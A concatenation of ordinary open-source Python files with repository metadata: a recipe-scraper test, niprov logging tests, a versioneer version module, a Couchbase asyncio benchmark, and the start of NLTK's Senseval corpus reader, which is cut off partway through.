            "https://www.heinzbrasil.com.br/recipe/100149100002/chili-com-carne",
            self.harvester_class.canonical_url(),
        )

    def test_title(self):
        self.assertEqual(self.harvester_class.title(), "Chili com carne")

    def test_image(self):
        # Protocol-relative URL, exactly as it appears in the page markup.
        self.assertEqual(
            "//d36rz30b5p7lsd.cloudfront.net/heinzbrasilbr/recipes/img/1e1fccb2d38d8b3e3611aa5c99706523.jpeg",
            self.harvester_class.image(),
        )

    def test_ingredients(self):
        # Order-insensitive comparison: the site may reorder the list.
        self.assertCountEqual(
            [
                "1 kg de carne moída",
                "1 cebola picada",
                "1 pimentão vermelho cortado em cubos",
                "1 pimentão verde cortado em cubos",
                "100 g de manteiga",
                "50 ml azeite",
                "20 g de especiarias mexicanas (pimentão, cominho, coentro...)",
                "100 ml de café forte",
                "150 g de milho crocante, escorrido",
                "200 g de feijão lavado e escorrido (feijão vermelho da América do Sul)",
                "2 tomates grandes cortados em cubos",
                "400 ml de Ketchup Heinz",
                "200 g de queijo gruyère ralado fininho",
            ],
            self.harvester_class.ingredients(),
        )

    def test_instructions(self):
        self.assertEqual(
            "Frite a carne, a cebola e os pimentões na manteiga com o azeite, mexendo bem. Despeje as especiarias mexicanas e o café. Adicione o milho, o feijão, os tomates picados e o Ketchup Heinz. Cozinhe por 5 minutos. Sirva com um bom pedaço de pão e gruyère.",
            self.harvester_class.instructions(),
        )
| {
"content_hash": "cf99579a91baafe48b55892d97f186ce",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 266,
"avg_line_length": 39.05882352941177,
"alnum_prop": 0.6049196787148594,
"repo_name": "hhursev/recipe-scraper",
"id": "81978a680f51016769e63f76e6e08e24deaebc08",
"size": "2007",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tests/test_heinzbrasil.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "88554"
}
],
"symlink_target": ""
} |
from mock import Mock, patch
from datetime import datetime as dt
from tests.ditest import DependencyInjectionTestBase
class LoggingTests(DependencyInjectionTestBase):
    """Tests for niprov.plogging.log().

    setUp wires the fake dependency container from the base class: the
    repository returns a canned parent image, location strings pass through
    unchanged, and niprov.plogging.add is patched so that every provenance
    dict it receives is recorded in self.provenancesAdded and a stub image
    is returned.
    """

    def setUp(self):
        super(LoggingTests, self).setUp()
        #self.repo.byLocation.return_value = True
        self.opts = Mock()
        self.opts.dryrun = False
        # Canned parent image with a fully populated provenance record.
        img = Mock()
        img.provenance = {'acquired':dt.now(),
                          'subject':'JD',
                          'protocol':'X',
                          'technique':'abc',
                          'repetition-time':1.0,
                          'epi-factor':1.0,
                          'magnetization-transfer-contrast':True,
                          'diffusion':True,
                          'echo-time':123,
                          'flip-angle':892,
                          'inversion-time':123}
        # Location strings are "validated" by identity, so tests can assert
        # on the raw paths they pass in.
        self.locationFactory.completeString.side_effect = lambda p: p
        self.repo.byLocation.return_value = img
        self.provenancesAdded = []
        # Replacement for niprov.plogging.add: records the provenance dict
        # and returns a stub image whose provenance marks the location.
        def wrapProv(location, transient=False, provenance=False, dependencies=None):
            self.provenancesAdded.append(provenance)
            self.newimg = Mock()
            self.newimg.provenance = {'parentfield':location}
            return self.newimg
        self.dependencies.reconfigureOrGetConfiguration.return_value = self.opts
        patcher = patch('niprov.plogging.add')
        self.add = patcher.start()
        self.add.side_effect = wrapProv
        self.addCleanup(patcher.stop)

    def log(self, *args, **kwargs):
        """Call niprov.plogging.log with the fake container and a patched
        inheritFrom that returns the child provenance unchanged."""
        import niprov.plogging
        with patch('niprov.plogging.inheritFrom') as self.inheritFrom:
            self.inheritFrom.side_effect = lambda p, p2: p
            return niprov.plogging.log(*args, dependencies=self.dependencies, opts=self.opts,
                                       **kwargs)

    def test_Returns_img(self):
        # log() returns the image object produced by add() for the new file.
        parents = ['/p/f1']
        new = '/p/f2'
        trans = 'Something cool'
        out = self.log(new, trans, parents)
        self.assertEqual(out, self.newimg)

    def test_Adds_code_or_logtext(self):
        self.log('new', 'trans', 'old', code='abc', logtext='def')
        self.assertEqual(self.provenancesAdded[0]['code'],'abc')
        self.assertEqual(self.provenancesAdded[0]['logtext'],'def')

    def test_Determines_user_and_logs_them(self):
        # The user service resolves the passed name; the resolved user is
        # what ends up in provenance.
        self.users.determineUser.return_value = 'paprika'
        self.log('new', 'trans', 'old', user='mononoko')
        self.users.determineUser.assert_called_with('mononoko')
        self.assertEqual(self.provenancesAdded[0]['user'],'paprika')

    def test_Script_added_to_provenance(self):
        parents = ['/p/f1']
        new = '/p/f2'
        trans = 'Something cool'
        script = '/p/test.py'
        self.log(new, trans, parents, script=script)
        self.assertEqual(self.provenancesAdded[0]['script'], script)

    def test_Accepts_and_processes_custom_provenance(self):
        parents = ['/p/f1']
        new = '/p/f2'
        trans = 'Something cool'
        p = {'akey':'avalue'}
        self.log(new, trans, parents, provenance=p)
        self.assertEqual(self.provenancesAdded[0]['akey'], 'avalue')

    def test_Calls_reconfigureOrGetConfiguration_on_dependencies(self):
        outOpts = Mock()
        outOpts.dryrun = True
        self.dependencies.reconfigureOrGetConfiguration.return_value = outOpts
        provenance = self.log(['/p/f1'], 'bla', ['/p/f2'], transient=True)
        self.dependencies.reconfigureOrGetConfiguration.assert_called_with(
            self.opts)

    def test_Can_pass_multiple_new_files(self):
        # Each new file gets its own provenance record, all sharing the
        # same (completed) parent locations.
        parents = ['p1','p2']
        new = ['/p/f2','/p/f3']
        trans = 'Something cool'
        self.locationFactory.completeString.side_effect = lambda p: 'l:'+p
        self.log(new, trans, parents)
        self.assertEqual(self.provenancesAdded[0]['parents'], ['l:p1','l:p2'])
        self.assertEqual(self.provenancesAdded[1]['parents'], ['l:p1','l:p2'])

    def test_Add_parent_if_parent_unknown(self):
        # Unknown parent: it is added to the repository first and the
        # listener is notified.
        self.repo.byLocation.return_value = None
        self.locationFactory.completeString.side_effect = lambda p: 'l:'+p
        provenance = self.log('new', 'trans', 'parentpath')
        self.add.assert_any_call('l:parentpath', dependencies=self.dependencies)
        self.listener.addUnknownParent.assert_called_with('l:parentpath')

    def test_Uses_validated_location_for_parent_lookup(self):
        self.locationFactory.completeString.side_effect = lambda p: 'l:'+p
        provenance = self.log('new', 'trans', 'parentpath')
        self.repo.byLocation.assert_called_with('l:parentpath')

    def test_Inherits_from_parent(self):
        parent = Mock()
        parent.provenance = {'x':123}
        inprov = {'a':89}
        self.repo.byLocation.return_value = parent
        self.locationFactory.completeString.side_effect = lambda p: 'l:'+p
        img = self.log('new', 'trans', 'parentpath', provenance=inprov)
        self.inheritFrom.assert_called_with(inprov, parent.provenance)

    def test_If_parent_unknown_uses_add_return_value(self):
        """In this case the parent provenance should be obtained from
        what add() returns.
        """
        self.locationFactory.completeString.side_effect = lambda p: 'l:'+p
        inprov = {'a':89}
        self.repo.byLocation.return_value = None
        img = self.log('new', 'trans', 'parentpath', provenance=inprov)
        ## add function is mocked to set 'acquired' field to location passed
        self.inheritFrom.assert_called_with(inprov, {'parentfield':'l:parentpath'})
| {
"content_hash": "c39cc670012dac18c12c5806829a9102",
"timestamp": "",
"source": "github",
"line_count": 130,
"max_line_length": 94,
"avg_line_length": 41.94615384615385,
"alnum_prop": 0.6246103062534385,
"repo_name": "ilogue/niprov",
"id": "b612b1108647121b61fa51d9ef200bca1651f157",
"size": "5453",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_logging.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "1187"
},
{
"name": "HTML",
"bytes": "2160"
},
{
"name": "JavaScript",
"bytes": "16060"
},
{
"name": "Mako",
"bytes": "6445"
},
{
"name": "Python",
"bytes": "327793"
},
{
"name": "Shell",
"bytes": "309"
}
],
"symlink_target": ""
} |
import errno
import os
import re
import subprocess
import sys
def get_keywords():
    """Return the git keyword-substitution values embedded in this file.

    The two strings below are placeholders that ``git archive`` expands.
    setup.py/versioneer.py greps for the variable names, so each one must
    stay on its own line; _version.py simply calls get_keywords().
    """
    git_refnames = "$Format:%d$"
    git_full = "$Format:%H$"
    return {"refnames": git_refnames, "full": git_full}
class VersioneerConfig:
    """Plain container object for versioneer configuration attributes."""


def get_config():
    """Return the static versioneer configuration for this project.

    These values are filled in when 'setup.py versioneer' creates
    _version.py.
    """
    cfg = VersioneerConfig()
    cfg.VCS = "git"
    cfg.style = "pep440"
    cfg.tag_prefix = "v"
    cfg.parentdir_prefix = "distributed_frontera-"
    cfg.versionfile_source = "distributed_frontera/_version.py"
    cfg.verbose = False
    return cfg
class NotThisMethod(Exception):
    """Raised when a particular version-discovery strategy does not apply."""
# Registry of {vcs: {method_name: handler}} populated by the decorator below.
LONG_VERSION_PY = {}
HANDLERS = {}


def register_vcs_handler(vcs, method):  # decorator
    """Return a decorator that files a function away under
    HANDLERS[vcs][method] and returns it unchanged."""
    def decorate(f):
        HANDLERS.setdefault(vcs, {})[method] = f
        return f
    return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False):
    """Try each executable name in *commands* until one starts; return its
    stripped stdout as text, or None if nothing could be run or the process
    exited non-zero.
    """
    assert isinstance(commands, list)
    process = None
    for command in commands:
        dispcmd = str([command] + args)
        try:
            # remember shell=False, so use git.cmd on windows, not just git
            process = subprocess.Popen(
                [command] + args, cwd=cwd, stdout=subprocess.PIPE,
                stderr=(subprocess.PIPE if hide_stderr else None))
            break
        except EnvironmentError as exc:
            if exc.errno == errno.ENOENT:
                # This name isn't installed; try the next candidate.
                continue
            if verbose:
                print("unable to run %s" % dispcmd)
                print(exc)
            return None
    else:
        # Exhausted every candidate without starting a process.
        if verbose:
            print("unable to find command, tried %s" % (commands,))
        return None
    stdout = process.communicate()[0].strip()
    if sys.version_info[0] >= 3:
        stdout = stdout.decode()
    if process.returncode != 0:
        if verbose:
            print("unable to run %s (error)" % dispcmd)
        return None
    return stdout
def versions_from_parentdir(parentdir_prefix, root, verbose):
    """Derive a version dict from the name of the source tree's directory.

    Source tarballs conventionally unpack into ``<project>-<version>``.
    Raises NotThisMethod when *root*'s basename lacks the expected prefix.
    """
    dirname = os.path.basename(root)
    if not dirname.startswith(parentdir_prefix):
        if verbose:
            print("guessing rootdir is '%s', but '%s' doesn't start with "
                  "prefix '%s'" % (root, dirname, parentdir_prefix))
        raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
    return {"version": dirname[len(parentdir_prefix):],
            "full-revisionid": None,
            "dirty": False,
            "error": None}
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
    """Extract the expanded keyword values from _version.py's source text.

    The code embedded in _version.py can just fetch the value of these
    keywords. When used from setup.py, we don't want to import _version.py,
    so we do it with a regexp instead. This function is not used from
    _version.py.

    Returns a dict with whichever of "refnames"/"full" were found; an
    unreadable file yields an empty dict.
    """
    keywords = {}
    try:
        # 'with' guarantees the handle is closed even if parsing raises;
        # the previous explicit close() was skipped on any non-EnvironmentError.
        with open(versionfile_abs, "r") as f:
            for line in f.readlines():
                if line.strip().startswith("git_refnames ="):
                    mo = re.search(r'=\s*"(.*)"', line)
                    if mo:
                        keywords["refnames"] = mo.group(1)
                if line.strip().startswith("git_full ="):
                    mo = re.search(r'=\s*"(.*)"', line)
                    if mo:
                        keywords["full"] = mo.group(1)
    except EnvironmentError:
        pass
    return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
    """Build a version dict from expanded git-archive keyword values.

    Raises NotThisMethod when the keywords are missing or unexpanded;
    returns "0+unknown" (with an error note) when no tag matches.
    """
    if not keywords:
        raise NotThisMethod("no keywords at all, weird")
    refnames = keywords["refnames"].strip()
    if refnames.startswith("$Format"):
        if verbose:
            print("keywords are unexpanded, not using")
        raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
    refs = {ref.strip() for ref in refnames.strip("()").split(",")}
    # starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
    # just "foo-1.0". If we see a "tag: " prefix, prefer those.
    TAG = "tag: "
    tags = {ref[len(TAG):] for ref in refs if ref.startswith(TAG)}
    if not tags:
        # Either we're using git < 1.8.3, or there really are no tags. We use
        # a heuristic: assume all version tags have a digit. The old git %d
        # expansion behaves like git log --decorate=short and strips out the
        # refs/heads/ and refs/tags/ prefixes that would let us distinguish
        # between branches and tags. By ignoring refnames without digits, we
        # filter out many common branch names like "release" and
        # "stabilization", as well as "HEAD" and "master".
        tags = {ref for ref in refs if re.search(r'\d', ref)}
        if verbose:
            print("discarding '%s', no digits" % ",".join(refs - tags))
    if verbose:
        print("likely tags: %s" % ",".join(sorted(tags)))
    for ref in sorted(tags):
        # sorting will prefer e.g. "2.0" over "2.0rc1"
        if ref.startswith(tag_prefix):
            version = ref[len(tag_prefix):]
            if verbose:
                print("picking %s" % version)
            return {"version": version,
                    "full-revisionid": keywords["full"].strip(),
                    "dirty": False, "error": None}
    # no suitable tags, so version is "0+unknown", but full hex is still there
    if verbose:
        print("no suitable tags, using unknown + full revision id")
    return {"version": "0+unknown",
            "full-revisionid": keywords["full"].strip(),
            "dirty": False, "error": "no suitable tags"}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
    """Interrogate a git checkout and collect raw version "pieces".

    Returns a dict with keys "long", "short", "error", "dirty" and — when
    git-describe output parses — "closest-tag" and "distance". On a
    parse/prefix failure, "error" is set and the partial dict is returned;
    a missing .git directory or failed git invocation raises NotThisMethod.
    """
    # this runs 'git' from the root of the source tree. This only gets called
    # if the git-archive 'subst' keywords were *not* expanded, and
    # _version.py hasn't already been rewritten with a short version string,
    # meaning we're inside a checked out source tree.
    if not os.path.exists(os.path.join(root, ".git")):
        if verbose:
            print("no .git in %s" % root)
        raise NotThisMethod("no .git directory")

    GITS = ["git"]
    if sys.platform == "win32":
        GITS = ["git.cmd", "git.exe"]
    # if there is a tag, this yields TAG-NUM-gHEX[-dirty]
    # if there are no tags, this yields HEX[-dirty] (no NUM)
    describe_out = run_command(GITS, ["describe", "--tags", "--dirty",
                                      "--always", "--long"],
                               cwd=root)
    # --long was added in git-1.5.5
    if describe_out is None:
        raise NotThisMethod("'git describe' failed")
    describe_out = describe_out.strip()
    full_out = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
    if full_out is None:
        raise NotThisMethod("'git rev-parse' failed")
    full_out = full_out.strip()

    pieces = {}
    pieces["long"] = full_out
    pieces["short"] = full_out[:7]  # maybe improved later
    pieces["error"] = None

    # parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
    # TAG might have hyphens.
    git_describe = describe_out

    # look for -dirty suffix
    dirty = git_describe.endswith("-dirty")
    pieces["dirty"] = dirty
    if dirty:
        git_describe = git_describe[:git_describe.rindex("-dirty")]

    # now we have TAG-NUM-gHEX or HEX

    if "-" in git_describe:
        # TAG-NUM-gHEX
        mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
        if not mo:
            # unparseable. Maybe git-describe is misbehaving?
            pieces["error"] = ("unable to parse git-describe output: '%s'"
                               % describe_out)
            return pieces

        # tag
        full_tag = mo.group(1)
        if not full_tag.startswith(tag_prefix):
            if verbose:
                fmt = "tag '%s' doesn't start with prefix '%s'"
                print(fmt % (full_tag, tag_prefix))
            pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
                               % (full_tag, tag_prefix))
            return pieces
        pieces["closest-tag"] = full_tag[len(tag_prefix):]

        # distance: number of commits since tag
        pieces["distance"] = int(mo.group(2))

        # commit: short hex revision ID
        pieces["short"] = mo.group(3)

    else:
        # HEX: no tags
        pieces["closest-tag"] = None
        count_out = run_command(GITS, ["rev-list", "HEAD", "--count"],
                                cwd=root)
        pieces["distance"] = int(count_out)  # total number of commits

    return pieces
def plus_or_dot(pieces):
    """Return the separator that starts/extends a PEP 440 local segment.

    "." when the closest tag already contains a "+" (a local version
    segment was started by the tag itself), otherwise "+". The ``or ""``
    also tolerates pieces["closest-tag"] being present but None, which the
    dict.get default alone would not ('in' on None raises TypeError).
    """
    if "+" in (pieces.get("closest-tag") or ""):
        return "."
    return "+"
def render_pep440(pieces):
    """Render TAG[+DISTANCE.gHEX[.dirty]] (PEP 440 local-version style).

    A tagged-then-dirtied tree renders as TAG+0.gHEX.dirty; with no tags
    at all the result is 0+untagged.DISTANCE.gHEX[.dirty].
    """
    tag = pieces["closest-tag"]
    if tag:
        rendered = tag
        if pieces["distance"] or pieces["dirty"]:
            # "." continues a local segment the tag already opened.
            rendered += "." if "+" in tag else "+"
            rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
            if pieces["dirty"]:
                rendered += ".dirty"
    else:
        # No tags at all.
        rendered = "0+untagged.%d.g%s" % (pieces["distance"],
                                          pieces["short"])
        if pieces["dirty"]:
            rendered += ".dirty"
    return rendered
def render_pep440_pre(pieces):
    """Render TAG[.post.devDISTANCE] — no -dirty marker in this style."""
    tag = pieces["closest-tag"]
    if not tag:
        # No tags at all.
        return "0.post.dev%d" % pieces["distance"]
    if pieces["distance"]:
        return tag + ".post.dev%d" % pieces["distance"]
    return tag
def render_pep440_post(pieces):
    """Render TAG[.postDISTANCE[.dev0]+gHEX].

    ".dev0" marks a dirty tree. Note that .dev0 sorts backwards (a dirty
    tree appears "older" than the corresponding clean one), but you
    shouldn't be releasing software with -dirty anyway.
    """
    tag = pieces["closest-tag"]
    if tag:
        rendered = tag
        if pieces["distance"] or pieces["dirty"]:
            rendered += ".post%d" % pieces["distance"]
            if pieces["dirty"]:
                rendered += ".dev0"
            # "." continues a local segment the tag already opened.
            rendered += "." if "+" in tag else "+"
            rendered += "g%s" % pieces["short"]
    else:
        # No tags at all.
        rendered = "0.post%d" % pieces["distance"]
        if pieces["dirty"]:
            rendered += ".dev0"
        rendered += "+g%s" % pieces["short"]
    return rendered
def render_pep440_old(pieces):
    """Render TAG[.postDISTANCE[.dev0]]; ".dev0" marks a dirty tree."""
    tag = pieces["closest-tag"]
    if tag:
        rendered = tag
        if pieces["distance"] or pieces["dirty"]:
            rendered += ".post%d" % pieces["distance"]
            if pieces["dirty"]:
                rendered += ".dev0"
    else:
        # No tags at all.
        rendered = "0.post%d" % pieces["distance"]
        if pieces["dirty"]:
            rendered += ".dev0"
    return rendered
def render_git_describe(pieces):
    """Render like 'git describe --tags --dirty --always'.

    With no tags at all the result is just HEX[-dirty] (no 'g' prefix).
    """
    tag = pieces["closest-tag"]
    if tag:
        rendered = tag
        if pieces["distance"]:
            rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
    else:
        rendered = pieces["short"]
    # The dirty marker applies in every case.
    if pieces["dirty"]:
        rendered += "-dirty"
    return rendered
def render_git_describe_long(pieces):
    """Render like 'git describe --tags --dirty --always --long'.

    The -DISTANCE-gHEX part is unconditional; with no tags at all the
    result is just HEX[-dirty] (no 'g' prefix).
    """
    tag = pieces["closest-tag"]
    if tag:
        rendered = "%s-%d-g%s" % (tag, pieces["distance"], pieces["short"])
    else:
        rendered = pieces["short"]
    if pieces["dirty"]:
        rendered += "-dirty"
    return rendered
def render(pieces, style):
    """Render *pieces* into a version dict using the requested style.

    An error recorded in pieces short-circuits to an "unknown" version;
    an unrecognized style raises ValueError.
    """
    if pieces["error"]:
        return {"version": "unknown",
                "full-revisionid": pieces.get("long"),
                "dirty": None,
                "error": pieces["error"]}

    if not style or style == "default":
        style = "pep440"  # the default

    renderers = {"pep440": render_pep440,
                 "pep440-pre": render_pep440_pre,
                 "pep440-post": render_pep440_post,
                 "pep440-old": render_pep440_old,
                 "git-describe": render_git_describe,
                 "git-describe-long": render_git_describe_long}
    renderer = renderers.get(style)
    if renderer is None:
        raise ValueError("unknown style '%s'" % style)
    rendered = renderer(pieces)

    return {"version": rendered, "full-revisionid": pieces["long"],
            "dirty": pieces["dirty"], "error": None}
def get_versions():
    """Compute version information for this tree, trying each strategy.

    Order: expanded git-archive keywords, then 'git describe' on a live
    checkout, then the parent-directory naming convention; falls back to
    "0+unknown" with an explanatory error string.
    """
    # I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
    # __file__, we can work backwards from there to the root. Some
    # py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
    # case we can only use expanded keywords.
    cfg = get_config()
    verbose = cfg.verbose

    try:
        return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
                                          verbose)
    except NotThisMethod:
        pass

    try:
        root = os.path.realpath(__file__)
        # versionfile_source is the relative path from the top of the source
        # tree (where the .git directory might live) to this file; walk up
        # one directory level per path component to find the root.
        for _ in cfg.versionfile_source.split('/'):
            root = os.path.dirname(root)
    except NameError:
        return {"version": "0+unknown", "full-revisionid": None,
                "dirty": None,
                "error": "unable to find root of source tree"}

    try:
        return render(git_pieces_from_vcs(cfg.tag_prefix, root, verbose),
                      cfg.style)
    except NotThisMethod:
        pass

    try:
        if cfg.parentdir_prefix:
            return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
    except NotThisMethod:
        pass

    return {"version": "0+unknown", "full-revisionid": None,
            "dirty": None,
            "error": "unable to compute version"}
| {
"content_hash": "1d7cb9a54410cd6020ee52adf27373f6",
"timestamp": "",
"source": "github",
"line_count": 450,
"max_line_length": 79,
"avg_line_length": 34.03777777777778,
"alnum_prop": 0.5720441339687928,
"repo_name": "stejesh/distributed-frontera",
"id": "b4fca205550b7d183b1ac4b818e04f2bedd5547c",
"size": "15792",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "distributed_frontera/_version.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "148237"
}
],
"symlink_target": ""
} |
"""Unit test package for BitcoinExchangeFH."""
| {
"content_hash": "5dc69bdf7f93ff009e4e4ba1b1e43fbd",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 46,
"avg_line_length": 47,
"alnum_prop": 0.7446808510638298,
"repo_name": "gavincyi/BitcoinExchangeFH",
"id": "88e5dd36f1d2d6b05bb79a680ba0bd7cbc6a4205",
"size": "72",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "202087"
}
],
"symlink_target": ""
} |
try:
import asyncio
except ImportError:
import trollius
asyncio = trollius
import argparse
from time import time
from couchbase.user_constants import FMT_BYTES
from couchbase.experimental import enable; enable()
from acouchbase.bucket import Bucket
# Command-line options for the benchmark run; parsed once at import time
# into the module-global 'options'.
ap = argparse.ArgumentParser()
ap.add_argument('-t', '--threads', default=4, type=int,
                help="Number of threads to spawn. 0 means no threads "
                     "but workload will still run in the main thread")
ap.add_argument('-d', '--delay', default=0, type=float,
                help="Number of seconds to wait between each op. "
                     "may be a fraction")
ap.add_argument('-p', '--password', default=None, type=str)
ap.add_argument('-U', '--connstr', default='couchbase://localhost/default',
                type=str)
ap.add_argument('-D', '--duration', default=10, type=int,
                help="Duration of run (in seconds)")
ap.add_argument('--ksize', default=12, type=int,
                help="Key size to use")
ap.add_argument('--vsize', default=128, type=int,
                help="Value size to use")
ap.add_argument('-g', '--global-instance',
                help="Use global instance", default=False,
                action='store_true')
ap.add_argument('--batch', '-N', type=int, help="Batch size", default=1)

options = ap.parse_args()
# Lazily-created shared Bucket (used only with --global-instance).
GLOBAL_INSTANCE = None
CONN_OPTIONS = {'connstr': options.connstr}


def make_instance():
    """Return a Bucket: a fresh one per call, or the shared singleton when
    --global-instance was requested."""
    global GLOBAL_INSTANCE
    if not options.global_instance:
        return Bucket(**CONN_OPTIONS)
    # Keep the original falsy check rather than 'is None'.
    if not GLOBAL_INSTANCE:
        GLOBAL_INSTANCE = Bucket(**CONN_OPTIONS)
    return GLOBAL_INSTANCE
class Worker(object):
    """Benchmark worker that repeatedly upserts a fixed key/value batch.

    The run() coroutine is defined twice: a 'yield from' version compiled
    via exec() on Python 3 (real asyncio), and a trollius.From() fallback
    bound when compiling the first raises SyntaxError (Python 2, where
    'yield from' is not valid syntax).
    """

    def __init__(self):
        self.delay = options.delay
        # Fixed-size key/value material sized from the CLI options.
        self.key = 'K' * options.ksize
        self.value = b'V' * options.vsize
        self.kv = {}
        for x in range(options.batch):
            self.kv[self.key + str(x)] = self.value
        # Accumulated time spent waiting on upserts, and total op count.
        self.wait_time = 0
        self.opcount = 0

    # Python 3 path: compile the 'yield from' coroutine at class-body time.
    try:
        exec('''
@asyncio.coroutine
def run(self):
    self.end_time = time() + options.duration
    cb = make_instance()
    yield from cb.connect()
    while time() < self.end_time:
        begin_time = time()
        yield from cb.upsert_multi(self.kv, format=FMT_BYTES)
        self.wait_time += time() - begin_time
        self.opcount += options.batch
''')
    except SyntaxError:
        # Python 2 path: 'yield from' is unavailable; use trollius.From().
        @asyncio.coroutine
        def run(self):
            self.end_time = time() + options.duration
            cb = make_instance()
            yield trollius.From(cb.connect())
            while time() < self.end_time:
                begin_time = time()
                yield trollius.From(cb.upsert_multi(self.kv, format=FMT_BYTES))
                self.wait_time += time() - begin_time
                self.opcount += options.batch
# Spawn one Worker (one asyncio task) per requested thread, run them all to
# completion, then report aggregate throughput.
global_begin = None
tasks = []
worker_threads = []
loop = asyncio.get_event_loop()
for x in range(options.threads):
    w = Worker()
    worker_threads.append(w)
    # NOTE(review): asyncio.async() was removed in Python 3.10 ('async' has
    # been a keyword since 3.7); on modern Python this would need to be
    # asyncio.ensure_future().
    tasks.append(asyncio.async(w.run()))
global_begin = time()
loop.run_until_complete(asyncio.wait(tasks))
global_duration = time() - global_begin
total_ops = sum([w.opcount for w in worker_threads])
total_time = 0
for t in worker_threads:
    total_time += t.wait_time
# [WAIT] rates ops against cumulative in-operation wait time; [ABS] against
# wall-clock duration of the whole run.
print("Total run took an absolute time of %0.2f seconds" % (global_duration,))
print("Did a total of %d operations" % (total_ops,))
print("Total wait time of %0.2f seconds" % (total_time,))
print("[WAIT] %0.2f ops/second" % (float(total_ops)/float(total_time),))
print("[ABS] %0.2f ops/second" % (float(total_ops)/float(global_duration),))
| {
"content_hash": "0fa17f031b551129389a4596898104cf",
"timestamp": "",
"source": "github",
"line_count": 116,
"max_line_length": 85,
"avg_line_length": 30.982758620689655,
"alnum_prop": 0.6160267111853088,
"repo_name": "mnunberg/couchbase-python-client",
"id": "47b2449114c321eaacc99bbba9c8da1c5e3d0098",
"size": "4221",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/abench.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "261401"
},
{
"name": "Python",
"bytes": "428174"
}
],
"symlink_target": ""
} |
"""
Read from the Senseval 2 Corpus.
SENSEVAL [http://www.senseval.org/]
Evaluation exercises for Word Sense Disambiguation.
Organized by ACL-SIGLEX [http://www.siglex.org/]
Prepared by Ted Pedersen <tpederse@umn.edu>, University of Minnesota,
http://www.d.umn.edu/~tpederse/data.html
Distributed with permission.
The NLTK version of the Senseval 2 files uses well-formed XML.
Each instance of the ambiguous words "hard", "interest", "line", and "serve"
is tagged with a sense identifier, and supplied with context.
"""
from __future__ import print_function, unicode_literals
import re
from xml.etree import ElementTree
from nltk import compat
from nltk.tokenize import *
from nltk.corpus.reader.util import *
from nltk.corpus.reader.api import *
@compat.python_2_unicode_compatible
class SensevalInstance(object):
    """One tagged occurrence of an ambiguous word.

    Holds the target word, its token offset in ``context``, the context
    tokens themselves, and the tuple of sense identifiers.
    """
    def __init__(self, word, position, context, senses):
        self.word = word
        self.position = position
        self.context = context
        self.senses = tuple(senses)

    def __repr__(self):
        template = ('SensevalInstance(word=%r, position=%r, '
                    'context=%r, senses=%r)')
        return template % (self.word, self.position,
                           self.context, self.senses)
class SensevalCorpusReader(CorpusReader):
    """Corpus reader for the Senseval 2 corpus files (well-formed XML)."""

    def instances(self, fileids=None):
        """Return the SensevalInstances of the given fileids, concatenated."""
        return concat([SensevalCorpusView(fileid, enc)
                       for (fileid, enc) in self.abspaths(fileids, True)])

    def raw(self, fileids=None):
        """
        :return: the text contents of the given fileids, as a single string.
        """
        if fileids is None: fileids = self._fileids
        elif isinstance(fileids, compat.string_types): fileids = [fileids]
        return concat([self.open(f).read() for f in fileids])

    def _entry(self, tree):
        # Collect (senseid, tagged-context) pairs from a parsed <lexelt>
        # element tree.  NOTE(review): appears unused by the reader itself;
        # presumably kept for backwards compatibility -- confirm before
        # removing.
        elts = []
        for lexelt in tree.findall('lexelt'):
            for inst in lexelt.findall('instance'):
                sense = inst[0].attrib['senseid']
                context = [(w.text, w.attrib['pos'])
                           for w in inst[1]]
                elts.append( (sense, context) )
        return elts
class SensevalCorpusView(StreamBackedCorpusView):
    """Stream-backed view that yields one SensevalInstance per <instance>
    element, tracking which <lexelt> each stream position belongs to."""

    def __init__(self, fileid, encoding):
        StreamBackedCorpusView.__init__(self, fileid, encoding=encoding)
        self._word_tokenizer = WhitespaceTokenizer()
        self._lexelt_starts = [0]  # list of streampos
        self._lexelts = [None]     # list of lexelt names

    def read_block(self, stream):
        """Read one <instance>...</instance> block from *stream*, repair its
        pseudo-XML, and return it parsed as a one-element list."""
        # Decide which lexical element we're in.
        # (bisect is assumed to be provided by the star-imports above --
        # TODO confirm.)
        lexelt_num = bisect.bisect_right(self._lexelt_starts, stream.tell())-1
        lexelt = self._lexelts[lexelt_num]

        instance_lines = []
        in_instance = False
        while True:
            line = stream.readline()
            if line == '':
                # End of file: must not be in the middle of an instance.
                assert instance_lines == []
                return []

            # Start of a lexical element?  Record its name and start offset
            # so later seeks can recover the enclosing lexelt.
            if line.lstrip().startswith('<lexelt'):
                lexelt_num += 1
                m = re.search('item=("[^"]+"|\'[^\']+\')', line)
                assert m is not None  # <lexelt> has no 'item=...'
                lexelt = m.group(1)[1:-1]
